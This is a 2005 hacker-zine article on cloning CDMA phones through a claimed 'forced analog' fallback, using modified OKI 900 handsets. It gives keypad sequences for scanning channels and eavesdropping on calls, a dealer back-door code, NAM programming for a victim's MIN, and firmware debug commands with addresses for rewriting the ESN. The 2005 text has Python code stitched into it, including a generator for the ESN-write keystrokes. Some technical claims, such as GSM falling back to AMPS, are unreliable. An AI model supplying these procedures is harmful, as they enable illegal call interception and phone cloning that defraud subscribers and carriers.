
Proof Of Concept: 'Forced Analog Transmission Workaround' of the CDMA network

Posted on January 9, 2005 by hitbsecnews

Note: The information within this article is published for INFORMATION PURPOSES ONLY. The use of any or all of the following information can be considered HIGHLY ILLEGAL. You have been warned.

By: Ezekial (of Avatar235)

After doing a lot of research and a bit of help from Av1,
Av4 and a number of Avatar235's friends I have come to the
conclusion that the Australian CDMA network structure is
insecure. This document will describe (in layman's terms)
a method that can be used to clone (copy) another CDMA
phone wirelessly and in an unintrusive manner (i.e. sneakiness).

***Cloning.

Cloning of mobile phones is the activity of copying the
subscriber identity from one phone onto another for the
purpose of obtaining free calls. This is done by reprogramming
an empty CDMA-compatible phone (a factory reset will empty one)
with the victim's ESN (Electronic Serial Number) and MIN
(Mobile Identification Number). Getting these numbers can
be tricky unless you have physical access to the victim's phone.

***Eavesdropping.

Eavesdropping is simply the act of listening in on a conversation
over the network from your mobile phone. See the next section
for details on which phones can be used.

***The infamous OKI.

The OKI 900 cellular phone is one of the most, if not the most,
modifiable cellular telephones in the world. It is based
around an 8051 microprocessor, and the main program is
stored on a 27C512 EPROM. OKI reproduced its popular
model 900 cellular phone for AT&T under the model AT&T 3730.
Both are identical in appearance and in circuitry. The 900
operates off 6 volts, either from a Ni-Cad battery or one
of two types of battery eliminator. The 900's antenna is an
SMA connector.

This phone (the 900) was the basis of most cellular hacks in
the time of the AMPS system structure in the US (and still is,
due to poor upgrading of the network structure). But don't be fooled:
not all OKIs are able to do the things described in this file.
The phones compatible with the functions described herein are:
OKI 900, 1150, 1325, and 1335.

None of these phones were for sale within Australia from
memory. You may be able to find similar functioning phones
in Aus like a number of Motorola Phones, but I have no
interest in these 'lower class phones'.

***Forced Analog Transmission (FAT).

Forced Analog Transmission is where the CDMA network
is congested to such a level that any new phones
entering the cell area are connected to the AMPS (analog)
backbone system of the telecommunications carriers.
This sub-network is in use every day by employees of the
telcos and even by your GSM and CDMA mobiles.

How is it used? Well, whenever you are out of normal
coverage on your GSM phone, your phone's on-screen status
should display 'Emergency calls only' or similar; this
status is your GSM mobile transferring over to the AMPS
backbone network. GSM for some reason does not transfer
over to the backbone when it encounters congestion, possibly
because of the encryption differences or the fact that the
GSM system is fairly reliable; don't quote me on this.

So anyway, the victim's CDMA phone transfers its ESN/MIN
pair to the backbone for authentication via CDMA's
standardized CAVE (Cellular Authentication and Voice Encryption)
algorithm, which generates a 128-bit sub-key called the
"Shared Secret Data" (SSD).

The A-Key, the ESN and the network-supplied RANDSSD are
the inputs to CAVE when it generates SSD. The A-Key itself
never goes over the air: the handset and the home
authentication centre each compute SSD independently from
the same inputs. The SSD has two parts: SSD_A (64 bits), for
creating authentication signatures, and SSD_B (64 bits), for
generating keys to encrypt voice and signalling messages
(voice encryption is not done when over FAT).

The SSD can be shared with roaming service providers
to allow local authentication. A fresh SSD can be
generated when a mobile returns to the home network
or roams to a different system.

I'm guessing most people here are thinking
'What the hell did that mean?' Simply: the
data for network identification of the mobile
is sent to the MSC (Mobile Switching Centre)
for authentication before 'pairing' the phone
to the system.

The trick is that the ESN/MIN pair is NOT encrypted on
its way to the MSC for authentication. So, if you wish to
clone a phone, you can scan the airwaves for this data
(then decode the bitstream and re-encode it via
software/hardware).
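As an added example (not part of the original article, and not the real CAVE algorithm, which is not reproduced here): a Python model of the SSD derivation and challenge-response flow described above. HMAC-SHA256 stands in for CAVE, the ESN, MIN and A-Key are constructed sample values, and `Switch.admit(..., authenticate=False)` models the analog fallback path the article describes, where the switch pairs the handset on ESN/MIN alone. It shows why a sniffed ESN/MIN pair is useless against a switch that actually challenges the handset (no A-Key, so no SSD, so no valid signature) and sufficient against one that does not.

```python
"""Toy model of the CAVE-style SSD derivation and challenge-response flow.

Added example, not from the original article. HMAC-SHA256 is a stand-in
for the real CAVE algorithm; only the key structure and message flow are
modelled. All identities and keys below are constructed sample values.
"""
import hashlib
import hmac
import os


def derive_ssd(a_key, esn, randssd):
    """SSD = CAVE(A-Key, ESN, RANDSSD): 128 bits, split into SSD_A and SSD_B.
    The A-Key never leaves the handset or the home authentication centre."""
    ssd = hmac.new(a_key, b"SSD|" + esn + randssd, hashlib.sha256).digest()[:16]
    return ssd[:8], ssd[8:]  # SSD_A (auth signatures), SSD_B (voice/signalling keys)


def auth_signature(ssd_a, rand, esn, min_):
    """AUTHR-style signature over the network's challenge RAND
    (18 bits in the real protocol; truncated to 3 bytes here)."""
    return hmac.new(ssd_a, b"AUTHR|" + rand + esn + min_, hashlib.sha256).digest()[:3]


class Handset:
    def __init__(self, esn, min_, a_key=None):
        self.esn, self.min, self.a_key = esn, min_, a_key
        self.ssd_a = self.ssd_b = None

    def ssd_update(self, randssd):
        if self.a_key is None:  # a clone built from a sniffed ESN/MIN has no A-Key
            return
        self.ssd_a, self.ssd_b = derive_ssd(self.a_key, self.esn, randssd)

    def access(self, rand):
        """Registration/origination message: ESN and MIN go over the air in the clear."""
        authr = None
        if rand is not None and self.ssd_a is not None:
            authr = auth_signature(self.ssd_a, rand, self.esn, self.min)
        return {"esn": self.esn, "min": self.min, "authr": authr}


class Switch:
    """MSC/AC side. authenticate=False models the analog fallback path
    where the switch pairs the phone on ESN/MIN alone."""

    def __init__(self, rng=os.urandom):
        self.rng = rng
        self.subscribers = {}  # esn -> {"min", "a_key", "ssd_a"}

    def provision(self, esn, min_, a_key):
        self.subscribers[esn] = {"min": min_, "a_key": a_key, "ssd_a": None}

    def ssd_update(self, esn):
        randssd = self.rng(7)  # RANDSSD is 56 bits
        sub = self.subscribers[esn]
        sub["ssd_a"], _ = derive_ssd(sub["a_key"], esn, randssd)
        return randssd  # only RANDSSD is sent to the handset, never the A-Key

    def challenge(self):
        return self.rng(4)  # RAND is 32 bits

    def admit(self, msg, rand=None, authenticate=True):
        sub = self.subscribers.get(msg["esn"])
        if sub is None or sub["min"] != msg["min"]:
            return False
        if not authenticate:
            return True  # an ESN/MIN match is all the fallback path checks
        expected = auth_signature(sub["ssd_a"], rand, msg["esn"], msg["min"])
        return msg["authr"] is not None and hmac.compare_digest(expected, msg["authr"])


def run_scenario(rng=os.urandom):
    esn, min_ = bytes.fromhex("8f00a5c3"), b"0412345678"  # constructed identity
    a_key = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed A-Key
    switch = Switch(rng)
    switch.provision(esn, min_, a_key)
    victim = Handset(esn, min_, a_key)
    randssd = switch.ssd_update(esn)
    victim.ssd_update(randssd)  # both sides now hold the same SSD
    clone = Handset(esn, min_)  # attacker has only what was sniffed: ESN + MIN
    clone.ssd_update(randssd)  # no-op: no A-Key, so no SSD
    guesser = Handset(esn, min_, bytes(16))  # attacker guessing an all-zero A-Key
    guesser.ssd_update(randssd)
    rand = switch.challenge()
    return {
        "victim_authenticated": switch.admit(victim.access(rand), rand),
        "clone_authenticated": switch.admit(clone.access(rand), rand),
        "guessed_akey_authenticated": switch.admit(guesser.access(rand), rand),
        "clone_on_fallback": switch.admit(clone.access(None), authenticate=False),
    }


if __name__ == "__main__":
    for name, ok in run_scenario().items():
        print(f"{name}: {ok}")
```

The point the model makes explicit: capturing ESN/MIN off the air gives an attacker the subscriber's identity but not the SSD, so every access that is actually challenged fails; the clone only works on a path where the switch never issues RAND.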

***Scanning the waves.

There are two purposes for scanning:

1. Eavesdropping.

Using an OKI described earlier, you will need to do the following:

Power on phone and immediately hold 7 + 9 at the
same time while it boots up for about two seconds.

Release 7 + 9 and hit Menu, Send, End, Recall,
Store, Clear and the phone should read good
timing!!!

If all goes well hit 1 + 3 at the same time to clear
the prompt.

Now hit #12 SND to receive audio.

Then hit #77 SND and you should hear a buzzing
noise because you have just enabled the loud
speaker.

Ok, now to begin the scanning of channels enter
the following command:

#73AAAABBBBCC SND
AAAA = 4 digit low channel number (Channel to begin scan on)
BBBB = 4 digit high channel (Cell Channel to end scan on)
CC = 2 digit number for how many seconds to scan each channel

For example if you want to scan channels 50-300 at a
1 second interval you would enter:

#730050030001 SND and your scan should begin.

Press # when you find a channel with someone talking
you want to listen to and press # again to resume scanning.
Press * to restart the scan.

Now if you only want to listen to a specific channel
on a lower volume just enter this instead:

#12 SND
#76 SND to turn the receiver on
#09 SND to select the channel you want to listen on.

2. Snatching Pairs.

Now sometimes you will come across a channel that
is widely described as 'hornets/bees buzzing'. This
is the encoded ESN/MIN pair. The OKI series described
has a headphone jack, so you can plug this into your computer
to record and decode. I will not go into decoding here, as
this is only a proof of concept, NOT a trainer in electronic
identity theft.

If you wish to build some devices that can scan the airwaves,
there is a book out by the author Rudolf F. "Rudy" Graf
called the Encyclopedia of Electronic Projects, Vol 7. It has
everything you would want to know about electronic surveillance
EXCEPT the holy grail, GSM intercepting.

***Cloning from your Snatched Pair

You will need to follow these instructions to the letter, as
this is very tricky stuff and could ruin your phone.

The MIN and the phone's system settings live in the NAM
(Number Assignment Module); the ESN is stored separately and,
on a modified phone, is written with the debug commands in the
'Enhancing your OKI' section. Program the NAM using these instructions:

1. Turn power on.

2. Within 30 seconds press RCL & MENU keys together and release, enter
* 1 2 3 4 5 6 7 8 #, (or enter dealer password if one has been used).

NOTE: If the dealer password is unknown and the factory default does not
work use the following "back door" code: * 6 2 7 2 9 8 5 4 #.

3. The phone will then display the Software Version followed by the
ESN in hex

NOTE: If you used the dealer password successfully in step 2 go straight
to step 5 below.

4. The phone will display "ENTER NEW PW AND STO". You may enter a ten-digit
password at this stage to be used in future re-programmings. Press
STO to retain the default password, or enter a ten-digit password and press STO.

5. The phone will display "RE-ENTER PW AND STO" re-enter the password, press
STO to confirm. Again, press STO to retain default password.

6. The following "re-set" options can be bypassed by pressing volume down
to scroll. Each step is followed two seconds later by "Press * to Clear",
you can either press * or press CLR to bypass.

Step#  Display             Action

01     SSN#                Wait 2 seconds.
       Press * to Reset    Press * to clear the social security number (not used).
02     SPD MEM CLR         Wait 2 seconds.
       Press * to Reset    Press * to initialize speed dial memories.
03     DEFAULT DATA SET    Wait 2 seconds.
       Press * to Reset    Press * to initialize the unit.
       POWER ON MESSAGE    Wait 2 seconds.
       Enter ALPHA         Enter up to 8 characters followed by STO,
                           or press CLR to bypass.

7. The STO key stores each entry.

8. The Volume UP key scrolls down through the steps.

9. The Volume DOWN key scrolls UP through the steps.

10. At any time press CLR to exit program mode. Phone will display
"NAM x Program" press CLR to exit, or continue with additional NAMS.
You may also go directly to any NAM by pressing Volume Down when phone
displays "NAM x Program". NAM's 2 through 5 only have steps 01 - 06
below.

PROGRAMMING DATA:

STEP#  # OF DIGITS / RANGE     DISPLAY    DESCRIPTION

01     10 digits               Own#       MIN (area code & phone number)
02     5 digits                System ID  System ID (SID)
03     4 digits                IPCH NO.   Initial paging channel (set automatically)
04     2 digits                ACCOLC     Access overload class
05     2 digits                GIM        Group ID mark (10 for USA)
06     3 or 4 digits           Unlock     Lock code
07     4 digits                SCM        Station class mark; use 1000
08     4 digits, each 0 or 1   OPTION     Option bits; 1 enables, from left to right:
                                          MIN mark, hands free, local use, (not used)
09     6 digits                SECURITY   Security code (default is the last
                                          six digits of the ESN)

***Enhancing your OKI.

OKI 900 Modifications

Several software modifications exist; below is a
list and an explanation of each. These mods are
to be burned into the 27C512 SOIC chip inside the
OKI 900. They are 150ns 28-pin SOIC chips. An SOIC
adapter will be required, and can probably be acquired
through the same place you got your burner. This chip
is located on the same side and same board as the LCD,
in the lower left-hand corner.

4701 - The original mod, holds 5 ESN programmed byte by byte.
4711 - Update to the 4701 (fixed bugs).
4712 - The most popular and least buggy mod. Works well with C-TEK (See 'C-tek' next section).

Change ESN: (for all above mods)

Press MENU 8 times, until you see ADM menu.
Press RCL and enter 123456
Use RCL to move from one ESN to another,
and STO to save your options.
REBOOT Phone!!!!!

Enter Debug Mode:

ESN Number Address
--------------------------------
ESN Location #1 $BE8E-$BE91
ESN Location #2 $BE93-$BE96
ESN Location #3 $BE98-$BE9B
ESN Location #4 $BE9D-$BEA0
ESN location #5 $BEA2-$BEA5

Key:
#54 XXXX xx
| | |
| | In order, one thru four bytes of ESN
| |
| Address (Location)
|
The write byte debug command

To use the 0-9 keys, just use 0-9, to access A-F, hit STAR ("*")
before 1-6 for A-F. The "*" key can be thought of as a shift key.
If you hit the "*" twice, it will act as if you did not hit the "*"
at all.
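As an added example (not part of the original article and not OKI or mod software), a Python helper that builds and parses the keypad command strings quoted above: the `#73AAAABBBBCC SND` scan command from the 'Scanning the waves' section and the `#54 <addr> <byte>` debug write with the `*` shift rule for A-F, using the ESN slot addresses from the mod table. The function names, the sample ESN, the most-significant-byte-first write order and the AMPS channel-to-frequency plan are this example's own assumptions; the command formats are as the article gives them.

```python
"""Builders and parsers for the OKI 900 keypad command formats quoted above.

Added example, not from the original article or any OKI software. The #73
scan format, the #54 write format, the '*' shift rule and the ESN slot
addresses follow the article; everything else here is an assumption.
"""
import re

# ESN slot addresses from the 47xx mod table above (4 bytes each)
ESN_SLOTS = {1: 0xBE8E, 2: 0xBE93, 3: 0xBE98, 4: 0xBE9D, 5: 0xBEA2}
# Hex digits A-F are keyed as '*' (shift) followed by 1-6
HEX_SHIFT = {"A": "*1", "B": "*2", "C": "*3", "D": "*4", "E": "*5", "F": "*6"}


def scan_command(low, high, secs):
    """'#73AAAABBBBCC SND': scan channels low..high, dwelling secs on each."""
    if not 0 <= low <= high <= 9999:
        raise ValueError("channel range must satisfy 0 <= low <= high <= 9999")
    if not 1 <= secs <= 99:
        raise ValueError("dwell time is a two-digit number of seconds")
    return f"#73{low:04d}{high:04d}{secs:02d} SND"


def channel_khz(n):
    """Standard AMPS channel plan (assumed, not from the article): returns
    (mobile transmit, base transmit) in kHz for channel n."""
    if 1 <= n <= 799:
        mobile = 825_000 + 30 * n
    elif 991 <= n <= 1023:
        mobile = 825_000 + 30 * (n - 1023)
    else:
        raise ValueError(f"channel {n} is outside the AMPS plan")
    return mobile, mobile + 45_000


def keypad_hex(hexstr):
    """Encode a hex string as OKI key presses: 0-9 literal, A-F as '*1'..'*6'."""
    if not re.fullmatch(r"[0-9A-Fa-f]+", hexstr):
        raise ValueError("not a hex string")
    return "".join(HEX_SHIFT.get(c, c) for c in hexstr.upper())


def parse_keypad_hex(keys):
    """Inverse of keypad_hex: '*' shifts the next digit to A-F; '**' cancels."""
    out, shift = [], False
    for k in keys:
        if k == "*":
            shift = not shift  # a second '*' undoes the first
        elif shift:
            if k not in "123456":
                raise ValueError(f"'*{k}' does not map to a hex digit")
            out.append("ABCDEF"[int(k) - 1])
            shift = False
        elif k in "0123456789":
            out.append(k)
        else:
            raise ValueError(f"unexpected key {k!r}")
    if shift:
        raise ValueError("trailing '*' with no digit")
    return "".join(out)


def esn_write_sequence(slot, esn_hex):
    """The four '#54 <addr> <byte>' debug commands that write a 32-bit ESN into
    one of the mod's ESN slots, most significant byte first (assumed order).
    Spaces separate fields as in the article's diagram; the keypad has none."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", esn_hex):
        raise ValueError("ESN must be 8 hex digits (32 bits)")
    base = ESN_SLOTS[slot]
    return [
        f"#54 {keypad_hex(f'{base + i:04X}')} {keypad_hex(esn_hex[2 * i:2 * i + 2])}"
        for i in range(4)
    ]


def parse_write_command(cmd):
    """Parse a spaced '#54 <addr> <byte>' string back into (address, value)."""
    m = re.fullmatch(r"#54\s*([0-9*]+)\s+([0-9*]+)", cmd)
    if not m:
        raise ValueError(f"not a #54 write command: {cmd!r}")
    return int(parse_keypad_hex(m.group(1)), 16), int(parse_keypad_hex(m.group(2)), 16)


if __name__ == "__main__":
    print(scan_command(50, 300, 1))  # the article's own example
    for line in esn_write_sequence(1, "8F00A5C3"):  # constructed sample ESN
        print(line, "->", parse_write_command(line))
```

`esn_write_sequence(1, "8F00A5C3")` yields `#54 *2*58*5 8*6`, `#54 *2*58*6 00`, `#54 *2*590 *15`, `#54 *2*591 *33`; note how the address BE8E alone needs three shifted digits, which is where hand-keyed writes usually go wrong.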

Program NAM:

Enter RCL + MENU, *, 6, 2, 7, 2, 9, 8, 5, 4, #
you can then use the up and down keys to scroll through the
information and change the appropriate nam.

4715 - Newest widely available mod. Should work with C-TEK
This mod will allow you to use 230 ESNs and set a number
of times each ESN can be used before auto deletion. Each NAM
must be programmed manually.

I have data relating to these mods and can be given on request.

The actual microcontroller is an 8051 derivative, and a lot of
information on programming it can be found on the Internet.

***C-TEK.

Cellular Telephone Experimenters Kit for the OKI-900/1150

The Cellular Telephone Experimenters Kit allows control of a cellular
telephone from a personal computer. The Kit connects any DOS-based PC
with a serial port to an OKI-900/1150 phone.

The kit is designed for technicians, students, professionals,
hobbyists, and others interested in using, learning, repairing,
and experimenting with cellular telephone technology.

The kit consists of an interface adapter, software and manual. The
interface adapter converts the cellular phone's proprietary interface to a
standard RS-232 interface, and allows connection of external audio signals
to the cellular phone. The interface is not designed for data transmission
over the cellular system.

The kit includes the cellular telephone interface adapter; a manual and a
short cellular tutorial; four programs; a programming library and
documentation; and cellular related informational files.

One program is designed for testing the phone and allows a technician to
activate many of the OKIs built in test modes and functions, such as tuning
to a particular channel, activating carrier, sat, signaling tones, etc.

Another program can be used to access the phone's user features, such as
programming NAMs, or uploading, downloading and editing the phone's 200
alphanumeric telephone number memories on the PC.

A programming library object module is supplied to allow you to write your
own programs to access the phone in both normal operating mode and in test
mode. The library contains functions such as tuning to a channel, turning
carrier/audio/sat-tones/signaling-tones on and off, reading received
signal strength, sending and receiving digital control messages, and
sending and decoding DTMF tones.

Two programs are supplied in source form that give examples of writing
applications in either of these modes. One of these programs shows how the
PC can completely control the cellular phone, making and receiving calls
while the phone is only operating in its test mode, with the PC handling
all of the cellular protocol and messaging functions. The other program
simply controls the phone by simulating presses on its keypad from the PC.

All code and libraries were compiled using Borland Turbo C 2.0 running
under DOS.

NOTE: The OKI 1335 Does not require the C-Tek Dongle Interface
cable, it is already RS-232 compliant :).

I have the schematics for a hacked version of
the C-Tek and sample software for learning to
program your OKI yourself.

***Software.

CIA-SCAN: fvoc and dtmf display via c-tek (does more)
Various other c-tek applications exist, mail me your list, and the files
and I will include them.

Scan1c: This appears to be an update to CIA SCAN. It has a graph of
signal strengths and most of the same features as CIA but with better
control, and can scan both forward, and backwards.

Please let me know of any additional Software you find for the OKI.

***Conclusion.

This is only a proof of concept. I do not condone Electronic Identity Theft.

When I receive my OKI 1335 from the US I will re-write this doc with pictures and make it a PDF.

Note: I just went off on a tangent with this doc and forgot to say that you will need to enter the ESN/MIN pair
into an empty CDMA phone. I have not tested using the OKI for
Forced Analog Transmission as standard. Sorry Guys.

1.) Basic Social Engineering Defense 101 - Israel
2.) How to Plan for a Possible Network Attack - Robert J. Shimonski.
3.) Brute Force - The Attackers Last Resort - Lineman
4.) X2 Free SMS Exploit - Ninja
5.) Proof Of Concept: 'Forced Analog Transmission Workaround' of the CDMA network - Ezekial
6.) Fun with Call Forwarding - Ninja
